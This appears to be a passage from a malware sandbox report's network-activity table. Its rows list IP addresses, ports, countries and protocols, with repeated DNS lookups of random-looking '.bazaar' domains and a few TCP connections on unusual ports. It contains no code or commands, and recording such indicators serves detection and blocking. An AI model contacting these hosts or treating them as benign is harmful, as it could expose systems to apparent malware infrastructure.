| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| FR | 193.248.44.2:2222 | tcp | |
| FR | 188.165.200.156:53 | ^afiiizbhiio.bazaar | udp |
| FR | 147.135.185.78:53 | ^afiiizbhiio.bazaar | udp |
| FR | 92.222.97.145:53 | ^afiiizbhiio.bazaar | udp |
| FR | 51.255.211.146:53 | ^afiiizbhiio.bazaar | udp |
| GB | 159.89.249.249:53 | ^afiiizbhiio.bazaar | udp |
| GB | 104.238.186.189:53 | ^afiiizbhiio.bazaar | udp |
| IN | 139.59.23.241:53 | ^afiiizbhiio.bazaar | udp |
| RU | 176.96.238.128:443 | tcp | |
| IT | 193.183.98.66:53 | ^afiiizbhiio.bazaar | udp |
| RS | 178.148.55.236:8080 | tcp | |
| IT | 94.177.171.127:53 | ^afiiizbhiio.bazaar | udp |
| JP | 45.63.124.65:53 | ^afiiizbhiio.bazaar | udp |
| LT | 212.24.98.54:53 | ^afiiizbhiio.bazaar | udp |
| MD | 178.17.170.179:53 | ^afiiizbhiio.bazaar | udp |
| NL | 185.208.208.141:53 | ^afiiizbhiio.bazaar | udp |
| NL | 82.196.9.45:53 | ^afiiizbhiio.bazaar | udp |
| NL | 146.185.176.36:53 | ^afiiizbhiio.bazaar | udp |
| SE | 89.35.39.64:53 | ^afiiizbhiio.bazaar | udp |
| RO | 89.18.27.167:53 | ^afiiizbhiio.bazaar | udp |
| RU | 77.73.68.161:53 | ^afiiizbhiio.bazaar | udp |
| RU | 91.217.137.37:53 | ^afiiizbhiio.bazaar | udp |
| RU | 185.117.154.144:53 | ^afiiizbhiio.bazaar | udp |
| SE | 176.126.70.119:53 | ^afiiizbhiio.bazaar | udp |
| SG | 139.99.96.146:53 | ^afiiizbhiio.bazaar | udp |
| UA | 217.12.210.54:53 | ^afiiizbhiio.bazaar | udp |
| FR | 193.248.44.2:2222 | tcp | |
| GB | 185.164.136.225:53 | ^afiiizbhiio.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| US | 192.52.166.110:53 | ^afiiizbhiio.bazaar | udp |
| US | 63.231.92.27:53 | ^afiiizbhiio.bazaar | udp |
| CA | 66.70.211.246:53 | ^afiiizbhiio.bazaar | udp |
| US | 96.47.228.108:53 | ^afiiizbhiio.bazaar | udp |
| US | 45.32.160.206:53 | ^afiiizbhiio.bazaar | udp |
| US | 128.52.130.209:53 | ^afiiizbhiio.bazaar | udp |
| US | 35.196.105.24:53 | ^afiiizbhiio.bazaar | udp |
| US | 172.98.193.42:53 | ^afiiizbhiio.bazaar | udp |
| US | 162.248.241.94:53 | ^afiiizbhiio.bazaar | udp |
| US | 107.172.42.186:53 | ^afiiizbhiio.bazaar | udp |
| US | 167.99.153.82:53 | ^afiiizbhiio.bazaar | udp |
| US | 138.197.25.214:53 | ^afiiizbhiio.bazaar | udp |
| US | 69.164.196.21:53 | ^afiiizbhiio.bazaar | udp |
| FR | 51.254.25.115:53 | _fdeilzgfeir.bazaar | udp |
| IT | 193.183.98.66:53 | _fdeilzgfeir.bazaar | udp |
| RU | 91.217.137.37:53 | _fdeilzgfeir.bazaar | udp |
| FR | 87.98.175.85:53 | _fdeilzgfeir.bazaar | udp |
| AT | 185.121.177.177:53 | _fdeilzgfeir.bazaar | udp |
| ZA | 169.239.202.202:53 | _fdeilzgfeir.bazaar | udp |
| US | 198.251.90.143:53 | _fdeilzgfeir.bazaar | udp |
| AT | 5.132.191.104:53 | _fdeilzgfeir.bazaar | udp |
| AU | 111.67.20.8:53 | _fdeilzgfeir.bazaar | udp |
| AU | 163.53.248.170:53 | _fdeilzgfeir.bazaar | udp |
| CA | 142.4.204.111:53 | _fdeilzgfeir.bazaar | udp |
| CA | 142.4.205.47:53 | _fdeilzgfeir.bazaar | udp |
| CA | 158.69.239.167:53 | _fdeilzgfeir.bazaar | udp |
| CA | 104.37.195.178:53 | _fdeilzgfeir.bazaar | udp |
| CA | 192.99.85.244:53 | _fdeilzgfeir.bazaar | udp |
| CA | 158.69.160.164:53 | _fdeilzgfeir.bazaar | udp |
| CH | 46.28.207.199:53 | _fdeilzgfeir.bazaar | udp |
| CH | 31.171.251.118:53 | _fdeilzgfeir.bazaar | udp |
| CZ | 81.2.241.148:53 | _fdeilzgfeir.bazaar | udp |
| FR | 51.254.25.115:53 | _fdeilzgfeir.bazaar | udp |
| DE | 82.141.39.32:53 | _fdeilzgfeir.bazaar | udp |
| DE | 50.3.82.215:53 | _fdeilzgfeir.bazaar | udp |
| DE | 46.101.70.183:53 | _fdeilzgfeir.bazaar | udp |
| DE | 5.45.97.127:53 | _fdeilzgfeir.bazaar | udp |
| DE | 130.255.78.223:53 | _fdeilzgfeir.bazaar | udp |
| DE | 144.76.133.38:53 | _fdeilzgfeir.bazaar | udp |
| DE | 139.59.208.246:53 | _fdeilzgfeir.bazaar | udp |
| DE | 172.104.136.243:53 | _fdeilzgfeir.bazaar | udp |
| EC | 45.71.112.70:53 | _fdeilzgfeir.bazaar | udp |
| FR | 163.172.185.51:53 | _fdeilzgfeir.bazaar | udp |
| FR | 87.98.175.85:53 | _fdeilzgfeir.bazaar | udp |
| FR | 5.135.183.146:53 | _fdeilzgfeir.bazaar | udp |
| FR | 51.255.48.78:53 | _fdeilzgfeir.bazaar | udp |
| FR | 188.165.200.156:53 | _fdeilzgfeir.bazaar | udp |
| FR | 147.135.185.78:53 | _fdeilzgfeir.bazaar | udp |
| FR | 92.222.97.145:53 | _fdeilzgfeir.bazaar | udp |
| FR | 51.255.211.146:53 | _fdeilzgfeir.bazaar | udp |
| GB | 159.89.249.249:53 | _fdeilzgfeir.bazaar | udp |
| GB | 104.238.186.189:53 | _fdeilzgfeir.bazaar | udp |
| IN | 139.59.23.241:53 | _fdeilzgfeir.bazaar | udp |
| IT | 193.183.98.66:53 | _fdeilzgfeir.bazaar | udp |
| IT | 94.177.171.127:53 | _fdeilzgfeir.bazaar | udp |
| JP | 45.63.124.65:53 | _fdeilzgfeir.bazaar | udp |
| LT | 212.24.98.54:53 | _fdeilzgfeir.bazaar | udp |
| MD | 178.17.170.179:53 | _fdeilzgfeir.bazaar | udp |
| NL | 185.208.208.141:53 | _fdeilzgfeir.bazaar | udp |
| NL | 82.196.9.45:53 | _fdeilzgfeir.bazaar | udp |
| NL | 146.185.176.36:53 | _fdeilzgfeir.bazaar | udp |
| SE | 89.35.39.64:53 | _fdeilzgfeir.bazaar | udp |
| RO | 89.18.27.167:53 | _fdeilzgfeir.bazaar | udp |
| RU | 77.73.68.161:53 | _fdeilzgfeir.bazaar | udp |
| RU | 91.217.137.37:53 | _fdeilzgfeir.bazaar | udp |
| RU | 185.117.154.144:53 | _fdeilzgfeir.bazaar | udp |
| SE | 176.126.70.119:53 | _fdeilzgfeir.bazaar | udp |
| SG | 139.99.96.146:53 | _fdeilzgfeir.bazaar | udp |
| UA | 217.12.210.54:53 | _fdeilzgfeir.bazaar | udp |
| GB | 185.164.136.225:53 | _fdeilzgfeir.bazaar | udp |
| US | 192.52.166.110:53 | _fdeilzgfeir.bazaar | udp |
| US | 63.231.92.27:53 | _fdeilzgfeir.bazaar | udp |
| CA | 66.70.211.246:53 | _fdeilzgfeir.bazaar | udp |
| US | 96.47.228.108:53 | _fdeilzgfeir.bazaar | udp |
| US | 45.32.160.206:53 | _fdeilzgfeir.bazaar | udp |
| US | 128.52.130.209:53 | _fdeilzgfeir.bazaar | udp |
| US | 35.196.105.24:53 | _fdeilzgfeir.bazaar | udp |
| US | 172.98.193.42:53 | _fdeilzgfeir.bazaar | udp |
| US | 162.248.241.94:53 | _fdeilzgfeir.bazaar | udp |
| US | 107.172.42.186:53 | _fdeilzgfeir.bazaar | udp |
| US | 167.99.153.82:53 | _fdeilzgfeir.bazaar | udp |
| US | 138.197.25.214:53 | _fdeilzgfeir.bazaar | udp |
| US | 69.164.196.21:53 | _fdeilzgfeir.bazaar | udp |
| FR | 51.254.25.115:53 | aafhilabhhir.bazaar | udp |
| IT | 193.183.98.66:53 | aafhilabhhir.bazaar | udp |
| RU | 91.217.137.37:53 | aafhilabhhir.bazaar | udp |
| FR | 87.98.175.85:53 | aafhilabhhir.bazaar | udp |
| AT | 185.121.177.177:53 | aafhilabhhir.bazaar | udp |
| ZA | 169.239.202.202:53 | aafhilabhhir.bazaar | udp |
| US | 198.251.90.143:53 | aafhilabhhir.bazaar | udp |
| AT | 5.132.191.104:53 | aafhilabhhir.bazaar | udp |
| AU | 111.67.20.8:53 | aafhilabhhir.bazaar | udp |
| AU | 163.53.248.170:53 | aafhilabhhir.bazaar | udp |
| CA | 142.4.204.111:53 | aafhilabhhir.bazaar | udp |
| CA | 142.4.205.47:53 | aafhilabhhir.bazaar | udp |
| CA | 158.69.239.167:53 | aafhilabhhir.bazaar | udp |
| CA | 104.37.195.178:53 | aafhilabhhir.bazaar | udp |
| FR | 193.248.44.2:2222 | tcp | |
| CA | 192.99.85.244:53 | aafhilabhhir.bazaar | udp |
| CA | 158.69.160.164:53 | aafhilabhhir.bazaar | udp |
| CH | 46.28.207.199:53 | aafhilabhhir.bazaar | udp |
| CH | 31.171.251.118:53 | aafhilabhhir.bazaar | udp |
| CZ | 81.2.241.148:53 | aafhilabhhir.bazaar | udp |
| FR | 51.254.25.115:53 | aafhilabhhir.bazaar | udp |
| DE | 82.141.39.32:53 | aafhilabhhir.bazaar | udp |
| DE | 50.3.82.215:53 | aafhilabhhir.bazaar | udp |
| DE | 46.101.70.183:53 | aafhilabhhir.bazaar | udp |
| DE | 5.45.97.127:53 | aafhilabhhir.bazaar | udp |
| DE | 130.255.78.223:53 | aafhilabhhir.bazaar | udp |
| DE | 144.76.133.38:53 | aafhilabhhir.bazaar | udp |
| DE | 139.59.208.246:53 | aafhilabhhir.bazaar | udp |
| DE | 172.104.136.243:53 | aafhilabhhir.bazaar | udp |
| CL | 190.163.31.26:80 | tcp | |
| EC | 45.71.112.70:53 | aafhilabhhir.bazaar | udp |
| FR | 163.172.185.51:53 | aafhilabhhir.bazaar | udp |
| FR | 87.98.175.85:53 | aafhilabhhir.bazaar | udp |
| FR | 5.135.183.146:53 | aafhilabhhir.bazaar | udp |
| FR | 51.255.48.78:53 | aafhilabhhir.bazaar | udp |
| FR | 188.165.200.156:53 | aafhilabhhir.bazaar | udp |
| FR | 147.135.185.78:53 | aafhilabhhir.bazaar | udp |
| FR | 92.222.97.145:53 | aafhilabhhir.bazaar | udp |
| AR | 181.230.116.163:80 | tcp | |
| FR | 51.255.211.146:53 | aafhilabhhir.bazaar | udp |
| GB | 159.89.249.249:53 | aafhilabhhir.bazaar | udp |
| GB | 104.238.186.189:53 | aafhilabhhir.bazaar | udp |
| IN | 139.59.23.241:53 | aafhilabhhir.bazaar | udp |
| IT | 193.183.98.66:53 | aafhilabhhir.bazaar | udp |
| IT | 94.177.171.127:53 | aafhilabhhir.bazaar | udp |
| JP | 45.63.124.65:53 | aafhilabhhir.bazaar | udp |
| UA | 37.52.87.0:80 | tcp | |
| LT | 212.24.98.54:53 | aafhilabhhir.bazaar | udp |
| MD | 178.17.170.179:53 | aafhilabhhir.bazaar | udp |
| NL | 185.208.208.141:53 | aafhilabhhir.bazaar | udp |
| KR | 39.118.245.6:443 | tcp | |
| NL | 82.196.9.45:53 | aafhilabhhir.bazaar | udp |
| NL | 146.185.176.36:53 | aafhilabhhir.bazaar | udp |
| SE | 89.35.39.64:53 | aafhilabhhir.bazaar | udp |
| RO | 89.18.27.167:53 | aafhilabhhir.bazaar | udp |
| RU | 77.73.68.161:53 | aafhilabhhir.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| RU | 91.217.137.37:53 | aafhilabhhir.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| RU | 185.117.154.144:53 | aafhilabhhir.bazaar | udp |
| SE | 176.126.70.119:53 | aafhilabhhir.bazaar | udp |
| SG | 139.99.96.146:53 | aafhilabhhir.bazaar | udp |
| UA | 217.12.210.54:53 | aafhilabhhir.bazaar | udp |
| GB | 185.164.136.225:53 | aafhilabhhir.bazaar | udp |
| US | 192.52.166.110:53 | aafhilabhhir.bazaar | udp |
| US | 63.231.92.27:53 | aafhilabhhir.bazaar | udp |
| CA | 66.70.211.246:53 | aafhilabhhir.bazaar | udp |
| US | 96.47.228.108:53 | aafhilabhhir.bazaar | udp |
| US | 45.32.160.206:53 | aafhilabhhir.bazaar | udp |
| US | 128.52.130.209:53 | aafhilabhhir.bazaar | udp |
| KR | 39.118.245.6:443 | tcp | |
| US | 35.196.105.24:53 | aafhilabhhir.bazaar | udp |
| US | 172.98.193.42:53 | aafhilabhhir.bazaar | udp |
| US | 162.248.241.94:53 | aafhilabhhir.bazaar | udp |
| US | 107.172.42.186:53 | aafhilabhhir.bazaar | udp |
| US | 167.99.153.82:53 | aafhilabhhir.bazaar | udp |
| US | 138.197.25.214:53 | aafhilabhhir.bazaar | udp |
| US | 69.164.196.21:53 | aafhilabhhir.bazaar | udp |
| FR | 51.254.25.115:53 | bafgikbbhgiq.bazaar | udp |
| IT | 193.183.98.66:53 | bafgikbbhgiq.bazaar | udp |
| RU | 91.217.137.37:53 | bafgikbbhgiq.bazaar | udp |
| FR | 87.98.175.85:53 | bafgikbbhgiq.bazaar | udp |
| AT | 185.121.177.177:53 | bafgikbbhgiq.bazaar | udp |
| ZA | 169.239.202.202:53 | bafgikbbhgiq.bazaar | udp |
| US | 198.251.90.143:53 | bafgikbbhgiq.bazaar | udp |
| AT | 5.132.191.104:53 | bafgikbbhgiq.bazaar | udp |
| AU | 111.67.20.8:53 | bafgikbbhgiq.bazaar | udp |
| AU | 163.53.248.170:53 | bafgikbbhgiq.bazaar | udp |
| CA | 142.4.204.111:53 | bafgikbbhgiq.bazaar | udp |
| CA | 142.4.205.47:53 | bafgikbbhgiq.bazaar | udp |
| CA | 158.69.239.167:53 | bafgikbbhgiq.bazaar | udp |
| CA | 104.37.195.178:53 | bafgikbbhgiq.bazaar | udp |
| CA | 192.99.85.244:53 | bafgikbbhgiq.bazaar | udp |
| CA | 158.69.160.164:53 | bafgikbbhgiq.bazaar | udp |
| CH | 46.28.207.199:53 | bafgikbbhgiq.bazaar | udp |
| CH | 31.171.251.118:53 | bafgikbbhgiq.bazaar | udp |
| CZ | 81.2.241.148:53 | bafgikbbhgiq.bazaar | udp |
| FR | 51.254.25.115:53 | bafgikbbhgiq.bazaar | udp |
| DE | 82.141.39.32:53 | bafgikbbhgiq.bazaar | udp |
| DE | 50.3.82.215:53 | bafgikbbhgiq.bazaar | udp |
| DE | 46.101.70.183:53 | bafgikbbhgiq.bazaar | udp |
| DE | 5.45.97.127:53 | bafgikbbhgiq.bazaar | udp |
| DE | 130.255.78.223:53 | bafgikbbhgiq.bazaar | udp |
| DE | 144.76.133.38:53 | bafgikbbhgiq.bazaar | udp |
| DE | 139.59.208.246:53 | bafgikbbhgiq.bazaar | udp |
| DE | 172.104.136.243:53 | bafgikbbhgiq.bazaar | udp |
| EC | 45.71.112.70:53 | bafgikbbhgiq.bazaar | udp |
| FR | 163.172.185.51:53 | bafgikbbhgiq.bazaar | udp |
| FR | 87.98.175.85:53 | bafgikbbhgiq.bazaar | udp |
| FR | 5.135.183.146:53 | bafgikbbhgiq.bazaar | udp |
| FR | 51.255.48.78:53 | bafgikbbhgiq.bazaar | udp |
| FR | 188.165.200.156:53 | bafgikbbhgiq.bazaar | udp |
| FR | 147.135.185.78:53 | bafgikbbhgiq.bazaar | udp |
| FR | 92.222.97.145:53 | bafgikbbhgiq.bazaar | udp |
| FR | 51.255.211.146:53 | bafgikbbhgiq.bazaar | udp |
| GB | 159.89.249.249:53 | bafgikbbhgiq.bazaar | udp |
| GB | 104.238.186.189:53 | bafgikbbhgiq.bazaar | udp |
| IN | 139.59.23.241:53 | bafgikbbhgiq.bazaar | udp |
| IT | 193.183.98.66:53 | bafgikbbhgiq.bazaar | udp |
| IT | 94.177.171.127:53 | bafgikbbhgiq.bazaar | udp |
| JP | 45.63.124.65:53 | bafgikbbhgiq.bazaar | udp |
| LT | 212.24.98.54:53 | bafgikbbhgiq.bazaar | udp |
| MD | 178.17.170.179:53 | bafgikbbhgiq.bazaar | udp |
| NL | 185.208.208.141:53 | bafgikbbhgiq.bazaar | udp |
| NL | 82.196.9.45:53 | bafgikbbhgiq.bazaar | udp |
| NL | 146.185.176.36:53 | bafgikbbhgiq.bazaar | udp |
| SE | 89.35.39.64:53 | bafgikbbhgiq.bazaar | udp |
| RO | 89.18.27.167:53 | bafgikbbhgiq.bazaar | udp |
| RU | 77.73.68.161:53 | bafgikbbhgiq.bazaar | udp |
| RU | 91.217.137.37:53 | bafgikbbhgiq.bazaar | udp |
| RU | 185.117.154.144:53 | bafgikbbhgiq.bazaar | udp |
| SE | 176.126.70.119:53 | bafgikbbhgiq.bazaar | udp |
| SG | 139.99.96.146:53 | bafgikbbhgiq.bazaar | udp |
| UA | 217.12.210.54:53 | bafgikbbhgiq.bazaar | udp |
| GB | 185.164.136.225:53 | bafgikbbhgiq.bazaar | udp |
| US | 192.52.166.110:53 | bafgikbbhgiq.bazaar | udp |
| US | 63.231.92.27:53 | bafgikbbhgiq.bazaar | udp |
| CA | 66.70.211.246:53 | bafgikbbhgiq.bazaar | udp |
| US | 96.47.228.108:53 | bafgikbbhgiq.bazaar | udp |
| US | 45.32.160.206:53 | bafgikbbhgiq.bazaar | udp |
| US | 128.52.130.209:53 | bafgikbbhgiq.bazaar | udp |
| US | 35.196.105.24:53 | bafgikbbhgiq.bazaar | udp |
| US | 172.98.193.42:53 | bafgikbbhgiq.bazaar | udp |
| US | 162.248.241.94:53 | bafgikbbhgiq.bazaar | udp |
| US | 107.172.42.186:53 | bafgikbbhgiq.bazaar | udp |
| US | 167.99.153.82:53 | bafgikbbhgiq.bazaar | udp |
| US | 138.197.25.214:53 | bafgikbbhgiq.bazaar | udp |
| US | 69.164.196.21:53 | bafgikbbhgiq.bazaar | udp |
| FR | 51.254.25.115:53 | abfhjkachhjq.bazaar | udp |
| IT | 193.183.98.66:53 | abfhjkachhjq.bazaar | udp |
| RU | 91.217.137.37:53 | abfhjkachhjq.bazaar | udp |
| FR | 87.98.175.85:53 | abfhjkachhjq.bazaar | udp |
| AT | 185.121.177.177:53 | abfhjkachhjq.bazaar | udp |
| ZA | 169.239.202.202:53 | abfhjkachhjq.bazaar | udp |
| US | 198.251.90.143:53 | abfhjkachhjq.bazaar | udp |
| AT | 5.132.191.104:53 | abfhjkachhjq.bazaar | udp |
| AU | 111.67.20.8:53 | abfhjkachhjq.bazaar | udp |
| AU | 163.53.248.170:53 | abfhjkachhjq.bazaar | udp |
| CA | 142.4.204.111:53 | abfhjkachhjq.bazaar | udp |
| CA | 142.4.205.47:53 | abfhjkachhjq.bazaar | udp |
| KR | 39.118.245.6:443 | tcp | |
| RU | 176.96.238.128:443 | tcp | |
| CA | 158.69.239.167:53 | abfhjkachhjq.bazaar | udp |
| CA | 104.37.195.178:53 | abfhjkachhjq.bazaar | udp |
| TR | 95.9.180.128:80 | tcp | |
| CA | 192.99.85.244:53 | abfhjkachhjq.bazaar | udp |
| CA | 158.69.160.164:53 | abfhjkachhjq.bazaar | udp |
| CH | 46.28.207.199:53 | abfhjkachhjq.bazaar | udp |
| CH | 31.171.251.118:53 | abfhjkachhjq.bazaar | udp |
| CZ | 81.2.241.148:53 | abfhjkachhjq.bazaar | udp |
| FR | 51.254.25.115:53 | abfhjkachhjq.bazaar | udp |
| DE | 82.141.39.32:53 | abfhjkachhjq.bazaar | udp |
| DE | 50.3.82.215:53 | abfhjkachhjq.bazaar | udp |
| DE | 46.101.70.183:53 | abfhjkachhjq.bazaar | udp |
| DE | 5.45.97.127:53 | abfhjkachhjq.bazaar | udp |
| DE | 130.255.78.223:53 | abfhjkachhjq.bazaar | udp |
| DE | 144.76.133.38:53 | abfhjkachhjq.bazaar | udp |
| DE | 139.59.208.246:53 | abfhjkachhjq.bazaar | udp |
| DE | 172.104.136.243:53 | abfhjkachhjq.bazaar | udp |
| EC | 45.71.112.70:53 | abfhjkachhjq.bazaar | udp |
| FR | 163.172.185.51:53 | abfhjkachhjq.bazaar | udp |
| FR | 87.98.175.85:53 | abfhjkachhjq.bazaar | udp |
| FR | 5.135.183.146:53 | abfhjkachhjq.bazaar | udp |
| FR | 51.255.48.78:53 | abfhjkachhjq.bazaar | udp |
| FR | 188.165.200.156:53 | abfhjkachhjq.bazaar | udp |
| FR | 147.135.185.78:53 | abfhjkachhjq.bazaar | udp |
| FR | 92.222.97.145:53 | abfhjkachhjq.bazaar | udp |
| FR | 51.255.211.146:53 | abfhjkachhjq.bazaar | udp |
| GB | 159.89.249.249:53 | abfhjkachhjq.bazaar | udp |
| GB | 104.238.186.189:53 | abfhjkachhjq.bazaar | udp |
| IN | 139.59.23.241:53 | abfhjkachhjq.bazaar | udp |
| IT | 193.183.98.66:53 | abfhjkachhjq.bazaar | udp |
| IT | 94.177.171.127:53 | abfhjkachhjq.bazaar | udp |
| JP | 45.63.124.65:53 | abfhjkachhjq.bazaar | udp |
| LT | 212.24.98.54:53 | abfhjkachhjq.bazaar | udp |
| MD | 178.17.170.179:53 | abfhjkachhjq.bazaar | udp |
| NL | 185.208.208.141:53 | abfhjkachhjq.bazaar | udp |
| NL | 82.196.9.45:53 | abfhjkachhjq.bazaar | udp |
| NL | 146.185.176.36:53 | abfhjkachhjq.bazaar | udp |
| SE | 89.35.39.64:53 | abfhjkachhjq.bazaar | udp |
| RO | 89.18.27.167:53 | abfhjkachhjq.bazaar | udp |
| RU | 77.73.68.161:53 | abfhjkachhjq.bazaar | udp |
| RU | 91.217.137.37:53 | abfhjkachhjq.bazaar | udp |
| RU | 185.117.154.144:53 | abfhjkachhjq.bazaar | udp |
| SE | 176.126.70.119:53 | abfhjkachhjq.bazaar | udp |
| SG | 139.99.96.146:53 | abfhjkachhjq.bazaar | udp |
| UA | 217.12.210.54:53 | abfhjkachhjq.bazaar | udp |
| GB | 185.164.136.225:53 | abfhjkachhjq.bazaar | udp |
| US | 192.52.166.110:53 | abfhjkachhjq.bazaar | udp |
| US | 63.231.92.27:53 | abfhjkachhjq.bazaar | udp |
| CA | 66.70.211.246:53 | abfhjkachhjq.bazaar | udp |
| US | 96.47.228.108:53 | abfhjkachhjq.bazaar | udp |
| US | 45.32.160.206:53 | abfhjkachhjq.bazaar | udp |
| US | 128.52.130.209:53 | abfhjkachhjq.bazaar | udp |
| US | 35.196.105.24:53 | abfhjkachhjq.bazaar | udp |
| US | 172.98.193.42:53 | abfhjkachhjq.bazaar | udp |
| US | 162.248.241.94:53 | abfhjkachhjq.bazaar | udp |
| US | 107.172.42.186:53 | abfhjkachhjq.bazaar | udp |
| US | 167.99.153.82:53 | abfhjkachhjq.bazaar | udp |
| US | 138.197.25.214:53 | abfhjkachhjq.bazaar | udp |
| US | 69.164.196.21:53 | abfhjkachhjq.bazaar | udp |
| FR | 51.254.25.115:53 | aeeeikafgeiq.bazaar | udp |
| IT | 193.183.98.66:53 | aeeeikafgeiq.bazaar | udp |
| RU | 91.217.137.37:53 | aeeeikafgeiq.bazaar | udp |
| FR | 87.98.175.85:53 | aeeeikafgeiq.bazaar | udp |
| SE | 109.74.5.95:8080 | tcp | |
| AT | 185.121.177.177:53 | aeeeikafgeiq.bazaar | udp |
| ZA | 169.239.202.202:53 | aeeeikafgeiq.bazaar | udp |
| US | 198.251.90.143:53 | aeeeikafgeiq.bazaar | udp |
| AT | 5.132.191.104:53 | aeeeikafgeiq.bazaar | udp |
| AU | 111.67.20.8:53 | aeeeikafgeiq.bazaar | udp |
| AU | 163.53.248.170:53 | aeeeikafgeiq.bazaar | udp |
| CA | 142.4.204.111:53 | aeeeikafgeiq.bazaar | udp |
| DE | 77.90.136.129:8080 | tcp | |
| CA | 142.4.205.47:53 | aeeeikafgeiq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| KR | 39.118.245.6:443 | tcp | |
| CA | 158.69.239.167:53 | aeeeikafgeiq.bazaar | udp |
| CA | 104.37.195.178:53 | aeeeikafgeiq.bazaar | udp |
| CA | 192.99.85.244:53 | aeeeikafgeiq.bazaar | udp |
| CA | 158.69.160.164:53 | aeeeikafgeiq.bazaar | udp |
| CH | 46.28.207.199:53 | aeeeikafgeiq.bazaar | udp |
| CH | 31.171.251.118:53 | aeeeikafgeiq.bazaar | udp |
| CZ | 81.2.241.148:53 | aeeeikafgeiq.bazaar | udp |
| FR | 51.254.25.115:53 | aeeeikafgeiq.bazaar | udp |
| DE | 82.141.39.32:53 | aeeeikafgeiq.bazaar | udp |
| DE | 50.3.82.215:53 | aeeeikafgeiq.bazaar | udp |
| DE | 46.101.70.183:53 | aeeeikafgeiq.bazaar | udp |
| DE | 5.45.97.127:53 | aeeeikafgeiq.bazaar | udp |
| DE | 130.255.78.223:53 | aeeeikafgeiq.bazaar | udp |
| DE | 144.76.133.38:53 | aeeeikafgeiq.bazaar | udp |
| DE | 139.59.208.246:53 | aeeeikafgeiq.bazaar | udp |
| DE | 172.104.136.243:53 | aeeeikafgeiq.bazaar | udp |
| EC | 45.71.112.70:53 | aeeeikafgeiq.bazaar | udp |
| FR | 163.172.185.51:53 | aeeeikafgeiq.bazaar | udp |
| FR | 87.98.175.85:53 | aeeeikafgeiq.bazaar | udp |
| FR | 5.135.183.146:53 | aeeeikafgeiq.bazaar | udp |
| FR | 51.255.48.78:53 | aeeeikafgeiq.bazaar | udp |
| FR | 188.165.200.156:53 | aeeeikafgeiq.bazaar | udp |
| FR | 147.135.185.78:53 | aeeeikafgeiq.bazaar | udp |
| FR | 92.222.97.145:53 | aeeeikafgeiq.bazaar | udp |
| FR | 51.255.211.146:53 | aeeeikafgeiq.bazaar | udp |
| GB | 159.89.249.249:53 | aeeeikafgeiq.bazaar | udp |
| GB | 104.238.186.189:53 | aeeeikafgeiq.bazaar | udp |
| IN | 139.59.23.241:53 | aeeeikafgeiq.bazaar | udp |
| IT | 193.183.98.66:53 | aeeeikafgeiq.bazaar | udp |
| IT | 94.177.171.127:53 | aeeeikafgeiq.bazaar | udp |
| JP | 45.63.124.65:53 | aeeeikafgeiq.bazaar | udp |
| LT | 212.24.98.54:53 | aeeeikafgeiq.bazaar | udp |
| MD | 178.17.170.179:53 | aeeeikafgeiq.bazaar | udp |
| NL | 185.208.208.141:53 | aeeeikafgeiq.bazaar | udp |
| NL | 82.196.9.45:53 | aeeeikafgeiq.bazaar | udp |
| NL | 146.185.176.36:53 | aeeeikafgeiq.bazaar | udp |
| SE | 89.35.39.64:53 | aeeeikafgeiq.bazaar | udp |
| RO | 89.18.27.167:53 | aeeeikafgeiq.bazaar | udp |
| RU | 77.73.68.161:53 | aeeeikafgeiq.bazaar | udp |
| RU | 91.217.137.37:53 | aeeeikafgeiq.bazaar | udp |
| RU | 185.117.154.144:53 | aeeeikafgeiq.bazaar | udp |
| SE | 176.126.70.119:53 | aeeeikafgeiq.bazaar | udp |
| SG | 139.99.96.146:53 | aeeeikafgeiq.bazaar | udp |
| UA | 217.12.210.54:53 | aeeeikafgeiq.bazaar | udp |
| GB | 185.164.136.225:53 | aeeeikafgeiq.bazaar | udp |
| US | 192.52.166.110:53 | aeeeikafgeiq.bazaar | udp |
| US | 63.231.92.27:53 | aeeeikafgeiq.bazaar | udp |
| CA | 66.70.211.246:53 | aeeeikafgeiq.bazaar | udp |
| US | 96.47.228.108:53 | aeeeikafgeiq.bazaar | udp |
| US | 45.32.160.206:53 | aeeeikafgeiq.bazaar | udp |
| US | 128.52.130.209:53 | aeeeikafgeiq.bazaar | udp |
| US | 35.196.105.24:53 | aeeeikafgeiq.bazaar | udp |
| US | 172.98.193.42:53 | aeeeikafgeiq.bazaar | udp |
| US | 162.248.241.94:53 | aeeeikafgeiq.bazaar | udp |
| US | 107.172.42.186:53 | aeeeikafgeiq.bazaar | udp |
| US | 167.99.153.82:53 | aeeeikafgeiq.bazaar | udp |
| US | 138.197.25.214:53 | aeeeikafgeiq.bazaar | udp |
| US | 69.164.196.21:53 | aeeeikafgeiq.bazaar | udp |
| FR | 51.254.25.115:53 | bccfimbdefis.bazaar | udp |
| IT | 193.183.98.66:53 | bccfimbdefis.bazaar | udp |
| RU | 91.217.137.37:53 | bccfimbdefis.bazaar | udp |
| FR | 87.98.175.85:53 | bccfimbdefis.bazaar | udp |
| AT | 185.121.177.177:53 | bccfimbdefis.bazaar | udp |
| ZA | 169.239.202.202:53 | bccfimbdefis.bazaar | udp |
| US | 198.251.90.143:53 | bccfimbdefis.bazaar | udp |
| AT | 5.132.191.104:53 | bccfimbdefis.bazaar | udp |
| AU | 111.67.20.8:53 | bccfimbdefis.bazaar | udp |
| AU | 163.53.248.170:53 | bccfimbdefis.bazaar | udp |
| CA | 142.4.204.111:53 | bccfimbdefis.bazaar | udp |
| CA | 142.4.205.47:53 | bccfimbdefis.bazaar | udp |
| CA | 158.69.239.167:53 | bccfimbdefis.bazaar | udp |
| CA | 104.37.195.178:53 | bccfimbdefis.bazaar | udp |
| CA | 192.99.85.244:53 | bccfimbdefis.bazaar | udp |
| CA | 158.69.160.164:53 | bccfimbdefis.bazaar | udp |
| CH | 46.28.207.199:53 | bccfimbdefis.bazaar | udp |
| CH | 31.171.251.118:53 | bccfimbdefis.bazaar | udp |
| CZ | 81.2.241.148:53 | bccfimbdefis.bazaar | udp |
| FR | 51.254.25.115:53 | bccfimbdefis.bazaar | udp |
| DE | 82.141.39.32:53 | bccfimbdefis.bazaar | udp |
| DE | 50.3.82.215:53 | bccfimbdefis.bazaar | udp |
| DE | 46.101.70.183:53 | bccfimbdefis.bazaar | udp |
| DE | 5.45.97.127:53 | bccfimbdefis.bazaar | udp |
| DE | 130.255.78.223:53 | bccfimbdefis.bazaar | udp |
